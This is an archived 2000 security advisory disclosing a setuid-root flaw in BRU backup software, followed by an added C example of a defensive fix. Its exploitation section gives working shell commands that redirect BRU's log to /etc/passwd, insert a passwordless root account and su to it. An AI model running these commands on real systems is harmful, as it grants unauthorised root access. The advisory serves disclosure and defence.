Subject: BRU Vulnerability
From: root (comsec.admin GTE.NET)
Date: Tue Jun 06 2000 - 16:22:24 CDT
We have found a vulnerability in BRU during our 'Security Contest' for
our company.
The details are included.
--Riley Hassell Network Security Speakeasy Networks
1-206-728-9770 ext151
1-206-917-5151 Direct Line
BRU backup software Vulnerability:
Description: You can change the log file BRU uses by changing the BRUEXECLOG environment variable. Since bru is setuid root you can append to any file on the system.
Exploitation:
$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#
Temporary fix: Why do normal users need to run bru. ;)
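
A defensive counterpart to the issue reported above, as an added example that is not part of the original post and is not BRU's code: a setuid program ignores an environment-supplied log path whenever its real and effective uids differ, and opens its log with the invoking user's rights. The default path and both function names are assumptions made for illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L      /* seteuid(), O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed default path; the post does not give BRU's real one. */
static const char DEFAULT_LOG[] = "/var/log/backup-exec.log";

/* Pick the log path. ruid != euid means the process is running setuid, so
 * the environment belongs to a less privileged caller and is not trusted. */
const char *choose_log_path(const char *env_value, uid_t ruid, uid_t euid)
{
    if (ruid != euid)
        return DEFAULT_LOG;
    if (env_value == NULL || env_value[0] != '/')
        return DEFAULT_LOG;          /* unset, empty or relative path */
    return env_value;
}

/* Open a log for appending with the invoking user's rights, so the setuid
 * process cannot write where the caller could not. O_NOFOLLOW refuses a
 * symlink as the final path component. Returns the fd, or -1 on failure. */
int open_log_as_invoker(const char *path)
{
    uid_t saved = geteuid();
    int fd;

    if (seteuid(getuid()) != 0)      /* drop to the real uid */
        return -1;
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (seteuid(saved) != 0) {       /* restore; fail closed if we cannot */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    const char *path = choose_log_path(getenv("BRUEXECLOG"), getuid(), geteuid());

    printf("log path: %s\n", path);
    return 0;
}
```
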